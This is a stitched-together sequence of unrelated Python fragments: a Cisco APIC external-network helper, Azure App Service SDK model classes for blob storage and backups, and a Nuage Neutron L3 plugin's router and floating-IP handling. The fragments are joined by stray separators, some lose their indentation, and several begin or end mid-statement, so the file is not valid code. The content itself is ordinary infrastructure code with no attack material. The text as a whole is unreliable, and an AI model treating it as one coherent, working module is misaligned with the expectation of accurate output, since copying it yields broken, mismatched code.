        an ExternalNetwork DN set in its apic distinguished names.
        """
        if not self._is_external(network):
            return None, None, None
        ext_net_dn = (network.get(cisco_apic.DIST_NAMES, {})
                      .get(cisco_apic.EXTERNAL_NETWORK))
        if not ext_net_dn:
            return None, None, None
        nat_type = network.get(cisco_apic.NAT_TYPE)
        aim_ext_net = aim_resource.ExternalNetwork.from_dn(ext_net_dn)
        # The owning L3Outside is derived from the ExternalNetwork's DN.
        aim_l3out = aim_resource.L3Outside(
            tenant_name=aim_ext_net.tenant_name, name=aim_ext_net.l3out_name)
        return aim_l3out, aim_ext_net, self._nat_type_to_strategy(nat_type)
def _get_aim_nat_strategy_db(self, session, network_db):
if network_db.external is not None:
extn_db = extension_db.ExtensionDbMixin()
extn_info = extn_db.get_network_extn_db(session, network_db.id)
if extn_info and cisco_apic.EXTERNAL_NETWORK in extn_info:
dn | |
int
:param enabled: True if configuration is enabled, false if it is disabled and null if
configuration is not set.
:type enabled: bool
"""
_attribute_map = {
'sas_url': {'key': 'sasUrl', 'type': 'str'},
'retention_in_days': {'key': 'retentionInDays', 'type': 'int'},
'enabled': {'key': 'enabled', 'type': 'bool'},
}
    def __init__(
        self,
        *,
        sas_url: Optional[str] = None,
        retention_in_days: Optional[int] = None,
        enabled: Optional[bool] = None,
        **kwargs
    ):
        # All parameters are keyword-only; see the class docstring for
        # their meanings. Extra kwargs are forwarded to the msrest Model.
        super(AzureBlobStorageHttpLogsConfig, self).__init__(**kwargs)
        self.sas_url = sas_url
        self.retention_in_days = retention_in_days
        self.enabled = enabled
class AzureStorageInfoValue(msrest.serialization.Model):
    """Azure Files or Blob Storage access information value for dictionary storage.
    Variables are only populated by the server, and will be ignored when sending a request.
    :param type: Type of storage. Possible values include: "AzureFiles", "AzureBlob".
    :type type: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageType
    :param account_name: Name of the storage account.
    :type account_name: str
    :param share_name: Name of the file share (container name, for Blob storage).
    :type share_name: str
    :param access_key: Access key for the storage account.
    :type access_key: str
    :param mount_path: Path to mount the storage within the site's runtime environment.
    :type mount_path: str
    :ivar state: State of the storage account. Possible values include: "Ok", "InvalidCredentials",
     "InvalidShare".
    :vartype state: str or ~azure.mgmt.web.v2020_06_01.models.AzureStorageState
    """
    # Server-populated attributes; rejected by msrest if sent by the client.
    _validation = {
        'state': {'readonly': True},
    }
    # Maps Python attribute names to their JSON keys and msrest types.
    _attribute_map = {
        'type': {'key': 'type', 'type': 'str'},
        'account_name': {'key': 'accountName', 'type': 'str'},
        'share_name': {'key': 'shareName', 'type': 'str'},
        'access_key': {'key': 'accessKey', 'type': 'str'},
        'mount_path': {'key': 'mountPath', 'type': 'str'},
        'state': {'key': 'state', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        type: Optional[Union[str, "AzureStorageType"]] = None,
        account_name: Optional[str] = None,
        share_name: Optional[str] = None,
        access_key: Optional[str] = None,
        mount_path: Optional[str] = None,
        **kwargs
    ):
        super(AzureStorageInfoValue, self).__init__(**kwargs)
        self.type = type
        self.account_name = account_name
        self.share_name = share_name
        self.access_key = access_key
        self.mount_path = mount_path
        # Read-only; populated by the server on deserialization.
        self.state = None
class AzureStoragePropertyDictionaryResource(ProxyOnlyResource):
    """AzureStorageInfo dictionary resource.
    Variables are only populated by the server, and will be ignored when sending a request.
    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param properties: Azure storage accounts.
    :type properties: dict[str, ~azure.mgmt.web.v2020_06_01.models.AzureStorageInfoValue]
    """
    # Server-populated attributes; rejected by msrest if sent by the client.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }
    # Maps Python attribute names to their JSON keys and msrest types.
    # '{AzureStorageInfoValue}' denotes a dict of that model type.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'properties': {'key': 'properties', 'type': '{AzureStorageInfoValue}'},
    }
    def __init__(
        self,
        *,
        kind: Optional[str] = None,
        properties: Optional[Dict[str, "AzureStorageInfoValue"]] = None,
        **kwargs
    ):
        super(AzureStoragePropertyDictionaryResource, self).__init__(kind=kind, **kwargs)
        self.properties = properties
class AzureTableStorageApplicationLogsConfig(msrest.serialization.Model):
    """Application logs to Azure table storage configuration.
    All required parameters must be populated in order to send to Azure.
    :param level: Log level. Possible values include: "Off", "Verbose", "Information", "Warning",
     "Error".
    :type level: str or ~azure.mgmt.web.v2020_06_01.models.LogLevel
    :param sas_url: Required. SAS URL to an Azure table with add/query/delete permissions.
    :type sas_url: str
    """
    # msrest raises on serialization if required attributes are missing.
    _validation = {
        'sas_url': {'required': True},
    }
    # Maps Python attribute names to their JSON keys and msrest types.
    _attribute_map = {
        'level': {'key': 'level', 'type': 'str'},
        'sas_url': {'key': 'sasUrl', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        sas_url: str,
        level: Optional[Union[str, "LogLevel"]] = None,
        **kwargs
    ):
        super(AzureTableStorageApplicationLogsConfig, self).__init__(**kwargs)
        self.level = level
        self.sas_url = sas_url
class BackupItem(ProxyOnlyResource):
    """Backup description.
    Variables are only populated by the server, and will be ignored when sending a request.
    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :ivar backup_id: Id of the backup.
    :vartype backup_id: int
    :ivar storage_account_url: SAS URL for the storage account container which contains this
     backup.
    :vartype storage_account_url: str
    :ivar blob_name: Name of the blob which contains data for this backup.
    :vartype blob_name: str
    :ivar name_properties_name: Name of this backup.
    :vartype name_properties_name: str
    :ivar status: Backup status. Possible values include: "InProgress", "Failed", "Succeeded",
     "TimedOut", "Created", "Skipped", "PartiallySucceeded", "DeleteInProgress", "DeleteFailed",
     "Deleted".
    :vartype status: str or ~azure.mgmt.web.v2020_06_01.models.BackupItemStatus
    :ivar size_in_bytes: Size of the backup in bytes.
    :vartype size_in_bytes: long
    :ivar created: Timestamp of the backup creation.
    :vartype created: ~datetime.datetime
    :ivar log: Details regarding this backup. Might contain an error message.
    :vartype log: str
    :ivar databases: List of databases included in the backup.
    :vartype databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting]
    :ivar scheduled: True if this backup has been created due to a schedule being triggered.
    :vartype scheduled: bool
    :ivar last_restore_time_stamp: Timestamp of a last restore operation which used this backup.
    :vartype last_restore_time_stamp: ~datetime.datetime
    :ivar finished_time_stamp: Timestamp when this backup finished.
    :vartype finished_time_stamp: ~datetime.datetime
    :ivar correlation_id: Unique correlation identifier. Please use this along with the timestamp
     while communicating with Azure support.
    :vartype correlation_id: str
    :ivar website_size_in_bytes: Size of the original web app which has been backed up.
    :vartype website_size_in_bytes: long
    """
    # Every property of this model is server-populated (read-only); only
    # 'kind' can be supplied by the client.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
        'backup_id': {'readonly': True},
        'storage_account_url': {'readonly': True},
        'blob_name': {'readonly': True},
        'name_properties_name': {'readonly': True},
        'status': {'readonly': True},
        'size_in_bytes': {'readonly': True},
        'created': {'readonly': True},
        'log': {'readonly': True},
        'databases': {'readonly': True},
        'scheduled': {'readonly': True},
        'last_restore_time_stamp': {'readonly': True},
        'finished_time_stamp': {'readonly': True},
        'correlation_id': {'readonly': True},
        'website_size_in_bytes': {'readonly': True},
    }
    # Maps Python attribute names to their (nested) JSON keys and types;
    # 'properties.*' keys are flattened from the ARM properties envelope.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'backup_id': {'key': 'properties.id', 'type': 'int'},
        'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'},
        'blob_name': {'key': 'properties.blobName', 'type': 'str'},
        'name_properties_name': {'key': 'properties.name', 'type': 'str'},
        'status': {'key': 'properties.status', 'type': 'str'},
        'size_in_bytes': {'key': 'properties.sizeInBytes', 'type': 'long'},
        'created': {'key': 'properties.created', 'type': 'iso-8601'},
        'log': {'key': 'properties.log', 'type': 'str'},
        'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'},
        'scheduled': {'key': 'properties.scheduled', 'type': 'bool'},
        'last_restore_time_stamp': {'key': 'properties.lastRestoreTimeStamp', 'type': 'iso-8601'},
        'finished_time_stamp': {'key': 'properties.finishedTimeStamp', 'type': 'iso-8601'},
        'correlation_id': {'key': 'properties.correlationId', 'type': 'str'},
        'website_size_in_bytes': {'key': 'properties.websiteSizeInBytes', 'type': 'long'},
    }
    def __init__(
        self,
        *,
        kind: Optional[str] = None,
        **kwargs
    ):
        super(BackupItem, self).__init__(kind=kind, **kwargs)
        # All remaining attributes are read-only and populated by the
        # server on deserialization.
        self.backup_id = None
        self.storage_account_url = None
        self.blob_name = None
        self.name_properties_name = None
        self.status = None
        self.size_in_bytes = None
        self.created = None
        self.log = None
        self.databases = None
        self.scheduled = None
        self.last_restore_time_stamp = None
        self.finished_time_stamp = None
        self.correlation_id = None
        self.website_size_in_bytes = None
class BackupItemCollection(msrest.serialization.Model):
    """Collection of backup items.
    Variables are only populated by the server, and will be ignored when sending a request.
    All required parameters must be populated in order to send to Azure.
    :param value: Required. Collection of resources.
    :type value: list[~azure.mgmt.web.v2020_06_01.models.BackupItem]
    :ivar next_link: Link to next page of resources.
    :vartype next_link: str
    """
    # 'value' must be supplied; 'next_link' is server-populated paging state.
    _validation = {
        'value': {'required': True},
        'next_link': {'readonly': True},
    }
    # Maps Python attribute names to their JSON keys and msrest types.
    _attribute_map = {
        'value': {'key': 'value', 'type': '[BackupItem]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }
    def __init__(
        self,
        *,
        value: List["BackupItem"],
        **kwargs
    ):
        super(BackupItemCollection, self).__init__(**kwargs)
        self.value = value
        # Read-only; populated by the server on deserialization.
        self.next_link = None
class BackupRequest(ProxyOnlyResource):
    """Description of a backup which will be performed.
    Variables are only populated by the server, and will be ignored when sending a request.
    :ivar id: Resource Id.
    :vartype id: str
    :ivar name: Resource Name.
    :vartype name: str
    :param kind: Kind of resource.
    :type kind: str
    :ivar type: Resource type.
    :vartype type: str
    :param backup_name: Name of the backup.
    :type backup_name: str
    :param enabled: True if the backup schedule is enabled (must be included in that case), false
     if the backup schedule should be disabled.
    :type enabled: bool
    :param storage_account_url: SAS URL to the container.
    :type storage_account_url: str
    :param backup_schedule: Schedule for the backup if it is executed periodically.
    :type backup_schedule: ~azure.mgmt.web.v2020_06_01.models.BackupSchedule
    :param databases: Databases included in the backup.
    :type databases: list[~azure.mgmt.web.v2020_06_01.models.DatabaseBackupSetting]
    """
    # Server-populated attributes; rejected by msrest if sent by the client.
    _validation = {
        'id': {'readonly': True},
        'name': {'readonly': True},
        'type': {'readonly': True},
    }
    # Maps Python attribute names to their (nested) JSON keys and types;
    # 'properties.*' keys are flattened from the ARM properties envelope.
    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'kind': {'key': 'kind', 'type': 'str'},
        'type': {'key': 'type', 'type': 'str'},
        'backup_name': {'key': 'properties.backupName', 'type': 'str'},
        'enabled': {'key': 'properties.enabled', 'type': 'bool'},
        'storage_account_url': {'key': 'properties.storageAccountUrl', 'type': 'str'},
        'backup_schedule': {'key': 'properties.backupSchedule', 'type': 'BackupSchedule'},
        'databases': {'key': 'properties.databases', 'type': '[DatabaseBackupSetting]'},
    }
    def __init__(
        self,
        *,
        kind: Optional[str] = None,
        backup_name: Optional[str] = None,
        enabled: Optional[bool] = None,
        storage_account_url: Optional[str] = None,
        backup_schedule: Optional["BackupSchedule"] = None,
        databases: Optional[List["DatabaseBackupSetting"]] = None,
        **kwargs
    ):
        super(BackupRequest, self).__init__(kind=kind, **kwargs)
        self.backup_name = backup_name
        self.enabled = enabled
        self.storage_account_url = storage_account_url
        self.backup_schedule = backup_schedule
        self.databases = databases
class BackupSchedule(msrest.serialization.Model):
"""Description of a backup schedule. Describes how often should be the backup performed and what should | |
= ipv6_dhcp_ip = None
if dhcp_port:
on_exc(self.delete_dhcp_nuage_port_by_id, context,
dhcp_port['id'])
for fixed_ip in dhcp_port['fixed_ips']:
if (ipv4_subnet and
fixed_ip['subnet_id'] == ipv4_subnet['id']):
ipv4_dhcp_ip = fixed_ip['ip_address']
if (ipv6_subnet and
fixed_ip['subnet_id'] == ipv6_subnet['id']):
ipv6_dhcp_ip = fixed_ip['ip_address']
self.vsdclient.confirm_router_interface_not_in_use(router_id,
subnet)
network = self.core_plugin.get_network(context,
subnet['network_id'])
subnet_mapping['network_name'] = network['name']
with session.begin(subtransactions=True):
vsd_l2domain = (
self.vsdclient.create_l2domain_for_router_detach(
ipv4_subnet, subnet_mapping, ipv6_subnet, ipv4_dhcp_ip,
ipv6_dhcp_ip))
on_exc(self.vsdclient.delete_subnet,
l2dom_id=vsd_l2domain['nuage_l2domain_id'])
result = super(NuageL3Plugin,
self).remove_router_interface(context, router_id,
interface_info)
self.set_mapping_as_l2domain(session,
ipv4_subnet_mapping,
ipv6_subnet_mapping,
vsd_l2domain)
self.vsdclient.move_l3subnet_to_l2domain(
nuage_subn_id,
vsd_l2domain['nuage_l2domain_id'],
ipv4_subnet_mapping,
subnet,
ipv6_subnet_mapping
)
self._notify_add_del_router_interface(
constants.AFTER_DELETE,
context=context,
router_id=router_id,
subnet_id=subnet_id,
subnet_mapping=subnet_mapping)
routing_mechanisms.delete_nuage_subnet_parameters(context,
subnet_id)
LOG.debug("Deleted nuage domain subnet %s", nuage_subn_id)
return result
@staticmethod
def set_mapping_as_l3subnet(session, ipv4_subnet_mapping,
ipv6_subnet_mapping, vsd_subnet):
with session.begin(subtransactions=True):
if ipv4_subnet_mapping:
nuagedb.update_subnetl2dom_mapping(
ipv4_subnet_mapping,
{'nuage_subnet_id': vsd_subnet['ID'],
'nuage_l2dom_tmplt_id': None})
if ipv6_subnet_mapping:
nuagedb.update_subnetl2dom_mapping(
ipv6_subnet_mapping,
{'nuage_subnet_id': vsd_subnet['ID'],
'nuage_l2dom_tmplt_id': None})
    @nuage_utils.handle_nuage_api_error
    @lib_db_api.retry_if_session_inactive()
    @log_helpers.log_method_call
    def get_router(self, context, id, fields=None):
        """Return the router, enriched with its Nuage/VSD attributes.

        Fetches the backing VSD domain by external id and merges its
        routing attributes into the Neutron router dict.
        """
        router = super(NuageL3Plugin, self).get_router(context, id, fields)
        nuage_router = self.vsdclient.get_router_by_external(id)
        self._add_nuage_router_attributes(context.session, router,
                                          nuage_router)
        return self._fields(router, fields)
    @nuage_utils.handle_nuage_api_error
    @lib_db_api.retry_if_session_inactive()
    @log_helpers.log_method_call
    def get_routers(self, context, filters=None, fields=None,
                    sorts=None, limit=None, marker=None,
                    page_reverse=False):
        """List routers, adding only the DB-backed Nuage attributes.

        Unlike get_router, this does not fetch each domain from the VSD.
        """
        routers = super(NuageL3Plugin, self).get_routers(context, filters,
                                                         fields, sorts, limit,
                                                         marker, page_reverse)
        for router in routers:
            routing_mechanisms.add_nuage_router_attributes(context.session,
                                                           router)
            self._fields(router, fields)
        return routers
    def _add_nuage_router_attributes(self, session, router, nuage_router):
        """Merge VSD domain attributes into a Neutron router dict in place.

        No-op when nuage_router is None (e.g. the domain was not found on
        the VSD). Also annotates each extra route with its VSD route
        distinguisher and adds the DB-backed routing attributes.
        """
        if not nuage_router:
            return
        ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(
            session, router['id'])
        router['net_partition'] = ent_rtr_mapping['net_partition_id']
        router['tunnel_type'] = nuage_router.get('tunnelType')
        router['rd'] = nuage_router.get('routeDistinguisher')
        router['rt'] = nuage_router.get('routeTarget')
        router['ecmp_count'] = nuage_router.get('ECMPCount')
        router['nuage_backhaul_vnid'] = nuage_router.get('backHaulVNID')
        router['nuage_backhaul_rd'] = (nuage_router.get(
            'backHaulRouteDistinguisher'))
        router['nuage_backhaul_rt'] = nuage_router.get('backHaulRouteTarget')
        # Attach the VSD route distinguisher to each extra route that has
        # a matching static route on the domain.
        for route in router.get('routes', []):
            params = {
                'address': route['destination'],
                'nexthop': route['nexthop'],
                'nuage_domain_id': nuage_router['ID']
            }
            nuage_route = self.vsdclient.get_nuage_static_route(params)
            if nuage_route:
                route['rd'] = nuage_route['rd']
        routing_mechanisms.add_nuage_router_attributes(session, router)
    @nuage_utils.handle_nuage_api_error
    @lib_db_api.retry_if_session_inactive()
    @log_helpers.log_method_call
    def create_router(self, context, router):
        """Create a Neutron router backed by a Nuage VSD L3 domain.

        The Neutron router is created first; if the VSD domain creation
        fails, the Neutron router is deleted again and the exception is
        re-raised.
        """
        routing_mechanisms.update_routing_values(router['router'])
        # Deep-copy the request before the superclass mutates it; the
        # original request values are needed for the VSD calls below.
        req_router = copy.deepcopy(router['router'])
        net_partition = self._get_net_partition_for_entity(
            context, router['router'])
        self._validate_create_router(context, net_partition['name'], router)
        neutron_router = super(NuageL3Plugin, self).create_router(context,
                                                                  router)
        nuage_router = None
        try:
            nuage_router = self.vsdclient.create_l3domain(
                neutron_router, req_router, net_partition, context.tenant_name)
        except Exception:
            # Roll back the Neutron router, then re-raise.
            with excutils.save_and_reraise_exception():
                super(NuageL3Plugin, self).delete_router(
                    context, neutron_router['id'])
        if nuage_router:
            LOG.debug("Created nuage domain %s", nuage_router[
                'nuage_domain_id'])
            with context.session.begin(subtransactions=True):
                nuagedb.add_entrouter_mapping(context.session,
                                              net_partition['id'],
                                              neutron_router['id'],
                                              nuage_router['nuage_domain_id'],
                                              nuage_router['rt'],
                                              nuage_router['rd'])
            # Reflect the VSD domain attributes in the returned router.
            neutron_router['net_partition'] = net_partition['id']
            neutron_router['rd'] = nuage_router['rd']
            neutron_router['rt'] = nuage_router['rt']
            neutron_router['nuage_backhaul_vnid'] = \
                nuage_router['nuage_backhaul_vnid']
            neutron_router['nuage_backhaul_rd'] = \
                nuage_router['nuage_backhaul_rd']
            neutron_router['nuage_backhaul_rt'] = \
                nuage_router['nuage_backhaul_rt']
            neutron_router['nuage_router_template'] = \
                nuage_router['nuage_template_id']
            neutron_router['tunnel_type'] = nuage_router['tunnel_type']
            neutron_router['ecmp_count'] = nuage_router['ecmp_count']
            routing_mechanisms.update_nuage_router_parameters(
                req_router, context, neutron_router['id']
            )
            # adds Nuage_underlay attribute to neutron_router
            routing_mechanisms.add_nuage_router_attributes(context.session,
                                                           neutron_router)
        return neutron_router
    def _validate_create_router(self, context, netpart_name, router):
        """Reject router creation in the shared-infrastructure netpartition
        and non-admin attempts to set ecmp_count.

        :raises BadRequest: creation requested in shared infrastructure.
        :raises NuageNotAuthorized: ecmp_count set by a non-admin.
        """
        if netpart_name == constants.SHARED_INFRASTRUCTURE:
            msg = _("It is not allowed to create routers in "
                    "the net_partition {}").format(netpart_name)
            raise n_exc.BadRequest(resource='router', msg=msg)
        if 'ecmp_count' in router and not context.is_admin:
            msg = _("ecmp_count can only be set by an admin user.")
            raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg)
    @nuage_utils.handle_nuage_api_error
    @lib_db_api.retry_if_session_inactive()
    @log_helpers.log_method_call
    def update_router(self, context, id, router):
        """Update a router in Neutron and on the VSD, with rollback.

        Each forward step registers a compensating callable via on_exc;
        nuage_utils.rollback() runs them in reverse order if a later step
        raises. Note that several on_exc registrations intentionally pass
        the original (pre-update) values where the forward call passed the
        new ones, so that the same helper undoes the change.
        """
        updates = router['router']
        original_router = self.get_router(context, id)
        # Side effect: stores the entity/router mapping on the context.
        self._validate_update_router(context, id, updates)
        routing_mechanisms.update_routing_values(updates, original_router)
        ent_rtr_mapping = context.ent_rtr_mapping
        nuage_domain_id = ent_rtr_mapping['nuage_router_id']
        curr_router = self.get_router(context, id)
        old_routes = self._get_extra_routes_by_router_id(context, id)
        # Replace routes in curr_router with old_routes as the curr_router
        # contains also rd which disrupts rollback
        original_router['routes'] = old_routes
        with nuage_utils.rollback() as on_exc:
            router_updated = super(NuageL3Plugin, self).update_router(
                context,
                id,
                copy.deepcopy(router))
            on_exc(super(NuageL3Plugin, self).update_router,
                   context,
                   id,
                   {'router': copy.deepcopy(original_router)})
            if 'routes' in updates:
                self._update_nuage_router_static_routes(id,
                                                        nuage_domain_id,
                                                        old_routes,
                                                        updates['routes'])
                # Rollback reverses the diff: new routes become the "old"
                # list and vice versa.
                on_exc(self._update_nuage_router_static_routes, id,
                       nuage_domain_id, updates['routes'], old_routes)
            if 'routes' in updates and len(updates) == 1:
                # Routes were the only change; the VSD domain itself does
                # not need an update.
                pass
            else:
                self._update_nuage_router(nuage_domain_id, curr_router,
                                          updates,
                                          ent_rtr_mapping)
                # Rollback re-applies the pre-update router values: the
                # arguments are deliberately swapped relative to the
                # forward call above.
                on_exc(self._update_nuage_router, nuage_domain_id, updates,
                       curr_router, ent_rtr_mapping)
            nuage_router = self.vsdclient.get_router_by_external(id)
            self._add_nuage_router_attributes(context.session,
                                              router_updated, nuage_router)
            routing_mechanisms.update_nuage_router_parameters(
                updates, context, curr_router['id'])
            on_exc(routing_mechanisms.update_nuage_router_parameters,
                   original_router, context, original_router['id'])
            # Notify subscribers; they may append their own rollback
            # callables, which are executed in reverse on failure.
            rollbacks = []
            try:
                self.nuage_callbacks.notify(
                    resources.ROUTER, constants.AFTER_UPDATE, self,
                    context=context, updated_router=router_updated,
                    original_router=original_router,
                    request_router=updates, domain=nuage_router,
                    rollbacks=rollbacks)
            except Exception:
                with excutils.save_and_reraise_exception():
                    for rollback in reversed(rollbacks):
                        rollback[0](*rollback[1], **rollback[2])
            routing_mechanisms.add_nuage_router_attributes(context.session,
                                                           router_updated)
        return router_updated
    def _validate_update_router(self, context, id, router):
        """Validate a router update request.

        Rejects non-admin attempts to set ecmp_count and updates to
        routers without a VSD net-partition mapping. Side effect: the
        found mapping is stored on the context as ent_rtr_mapping for
        the caller (update_router) to reuse.
        """
        if 'ecmp_count' in router and not context.is_admin:
            msg = _("ecmp_count can only be set by an admin user.")
            raise nuage_exc.NuageNotAuthorized(resource='router', msg=msg)
        ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(context.session,
                                                               id)
        if not ent_rtr_mapping:
            msg = (_("Router %s does not hold net-partition "
                     "assoc on VSD. extra-route failed") % id)
            raise n_exc.BadRequest(resource='router', msg=msg)
        context.ent_rtr_mapping = ent_rtr_mapping
def _update_nuage_router_static_routes(self, id, nuage_domain_id,
old_routes, new_routes):
added, removed = helpers.diff_list_of_dict(old_routes, new_routes)
routes_removed = []
routes_added = []
try:
for route in removed:
self._delete_nuage_static_route(nuage_domain_id, route)
routes_removed.append(route)
for route in added:
self._add_nuage_static_route(id, nuage_domain_id, route)
routes_added.append(route)
except Exception as e:
for route in routes_added:
self._delete_nuage_static_route(nuage_domain_id, route)
for route in routes_removed:
self._add_nuage_static_route(id, nuage_domain_id, route)
raise e
def _add_nuage_static_route(self, router_id, nuage_domain_id, route):
params = {
'nuage_domain_id': nuage_domain_id,
'neutron_rtr_id': router_id,
'net': netaddr.IPNetwork(route['destination']),
'nexthop': route['nexthop']
}
self.vsdclient.create_nuage_staticroute(params)
def _delete_nuage_static_route(self, nuage_domain_id, route):
params = {
"address": route['destination'],
"nexthop": route['nexthop'],
"nuage_domain_id": nuage_domain_id
}
self.vsdclient.delete_nuage_staticroute(params)
    def _update_nuage_router(self, nuage_id, curr_router, router_updates,
                             ent_rtr_mapping):
        """Apply router_updates to the VSD domain and the DB mapping.

        NOTE: curr_router is mutated in place (updated with
        router_updates); update_router's rollback relies on calling this
        helper again with the two dict arguments swapped, so do not change
        this side effect or the argument order.
        """
        curr_router.update(router_updates)
        self.vsdclient.update_router(nuage_id, curr_router, router_updates)
        # Fall back to the currently mapped rt/rd when the update does not
        # change them.
        ns_dict = {
            'nuage_rtr_rt':
                router_updates.get('rt', ent_rtr_mapping.get('nuage_rtr_rt')),
            'nuage_rtr_rd':
                router_updates.get('rd', ent_rtr_mapping.get('nuage_rtr_rd'))
        }
        nuagedb.update_entrouter_mapping(ent_rtr_mapping, ns_dict)
    @nuage_utils.handle_nuage_api_error
    @lib_db_api.retry_if_session_inactive()
    @log_helpers.log_method_call
    def delete_router(self, context, id):
        """Delete a router in Neutron and its backing VSD L3 domain.

        Refuses deletion while router-interface ports exist. After the
        last router/subnet of the tenant is gone, the tenant's VSD user
        and group are cleaned up as well.

        :raises RouterInUse: the router still has interface ports.
        """
        neutron_router = self.get_router(context, id)
        session = context.session
        ent_rtr_mapping = nuagedb.get_ent_rtr_mapping_by_rtrid(session, id)
        # Can probably be removed after blueprint enginefacade-switch reaches
        # router-delete code upstream.
        # https://blueprints.launchpad.net/neutron/+spec/enginefacade-switch
        try:
            session.expunge(ent_rtr_mapping)
        except Exception as e:
            LOG.warn('Got exception when expunging session: {}'.format(str(e)))
        if ent_rtr_mapping:
            LOG.debug("Enterprise to router mapping found for router %s", id)
            filters = {
                'device_id': [id],
                'device_owner': [lib_constants.DEVICE_OWNER_ROUTER_INTF]
            }
            ports = self.core_plugin.get_ports(context, filters)
            if ports:
                raise l3_exc.RouterInUse(router_id=id)
            nuage_domain_id = ent_rtr_mapping['nuage_router_id']
            # These VSD conflicts are transient; retry the domain delete a
            # configured number of times when they occur.
            vsd_retry_error_codes = [(vsd_constants.CONFLICT_ERR_CODE,
                                      vsd_constants.VSD_VM_EXISTS_ON_VPORT),
                                     (vsd_constants.CONFLICT_ERR_CODE,
                                      vsd_constants.VSD_PG_IN_USE),
                                     (vsd_constants.CONFLICT_ERR_CODE,
                                      vsd_constants.VSD_VM_EXIST)]
            nuage_utils.retry_on_vsdclient_error(
                self.vsdclient.delete_l3domain,
                nr_attempts=cfg.CONF.RESTPROXY.
                server_max_retries_on_domain_delete,
                vsd_error_codes=vsd_retry_error_codes)(nuage_domain_id)
        super(NuageL3Plugin, self).delete_router(context, id)
        # Clean up the tenant's VSD user/group once it owns no more
        # routers or subnets.
        if ent_rtr_mapping and not self._check_router_subnet_for_tenant(
                context, neutron_router['tenant_id']):
            LOG.debug("No router/subnet found for tenant %s",
                      neutron_router['tenant_id'])
            user_id, group_id = self.vsdclient.get_usergroup(
                neutron_router['tenant_id'],
                ent_rtr_mapping['net_partition_id'])
            self.vsdclient.delete_user(user_id)
            self.vsdclient.delete_group(group_id)
@log_helpers.log_method_call
def _check_fip_on_port_with_multiple_ips(self, context, port_id):
    """Reject fip association to a port with multiple IPs of one family.

    Block associating a fip to a port carrying more than one IPv4 or
    more than one IPv6 address (as of 5.3.1).

    :raises nuage_exc.NuageBadRequest: on multiple v4 or v6 addresses
    """
    if port_id:
        port = self.core_plugin._get_port(context, port_id)
        fixed_ips = port['fixed_ips']
        if not fixed_ips:
            return
        ipv4s, ipv6s = self.count_fixed_ips_per_version(fixed_ips)
        if ipv4s > 1 or ipv6s > 1:
            # Fixed: the wrapped literal was missing a space, producing
            # the user-facing text "...multiple ipv6ips.".
            msg = _('floating ip cannot be associated to '
                    'port {} because it has multiple ipv4 or multiple '
                    'ipv6 ips.').format(port_id)
            raise nuage_exc.NuageBadRequest(msg=msg)
@log_helpers.log_method_call
def _check_floatingip_update(self, context, port,
                             vport_type=constants.VM_VPORT,
                             vport_id=None):
    """Re-apply the floating ip (if any) currently bound to ``port``.

    Looks up the fip fixed to the port and re-runs the create/update
    flow against the given vport, without touching rate limiting.
    """
    # Renamed from 'filter' to avoid shadowing the builtin.
    filters = {'fixed_port_id': [port['id']]}
    local_fip = self.get_floatingips(context,
                                     filters=filters)
    if local_fip:
        fip = local_fip[0]
        self._create_update_floatingip(context,
                                       fip, port['id'],
                                       vport_type=vport_type,
                                       vport_id=vport_id,
                                       rate_update=False)
@log_helpers.log_method_call
def _create_update_floatingip(self, context,
                              neutron_fip, port_id,
                              last_known_router_id=None,
                              vport_type=constants.VM_VPORT,
                              vport_id=None,
                              rate_update=True):
    """Create or update the VSD floating ip backing ``neutron_fip``.

    Looks up (or creates) the fip on VSD, disassociates it from a
    previously-bound vport when needed, re-homes it when the target
    vport lives in a different L3 domain, associates it with the target
    vport, and optionally refreshes rate limiting.

    :param neutron_fip: the Neutron floatingip dict
    :param port_id: id of the port being (dis)associated
    :param last_known_router_id: router to validate against instead of
        the fip's current router (used on disassociation flows)
    :param rate_update: when True, (re)apply fip rate limiting
    """
    ent_rtr_mapping, fip_pool, nuage_vport = self._validate_processing_fip(
        context, last_known_router_id, neutron_fip, port_id, vport_id,
        vport_type)
    params = {
        'fip_id': neutron_fip['id'],
    }
    fip = self.vsdclient.get_nuage_fip_by_id(params)
    if not fip:
        # No fip on VSD yet: create one in the pool of the fip's router
        # domain.
        LOG.debug("Floating ip not found in VSD for fip %s",
                  neutron_fip['id'])
        params = {
            'nuage_rtr_id': ent_rtr_mapping['nuage_router_id'],
            'nuage_fippool_id': fip_pool['nuage_fip_pool_id'],
            'neutron_fip_ip': neutron_fip['floating_ip_address'],
            'neutron_fip_id': neutron_fip['id']
        }
        fip = self.vsdclient.create_nuage_floatingip_details(
            params)
        nuage_fip_id = fip['ID']
        nuage_fip_associated = fip['assigned']
        needs_fip_association = not nuage_fip_associated
    else:
        nuage_fip_id = fip['nuage_fip_id']
        nuage_fip_associated = fip['nuage_assigned']
        needs_fip_association = not nuage_fip_associated
    if nuage_vport and nuage_fip_associated:
        # Fip already assigned on VSD: find the currently bound vport
        # and detach it first when it differs from the target vport.
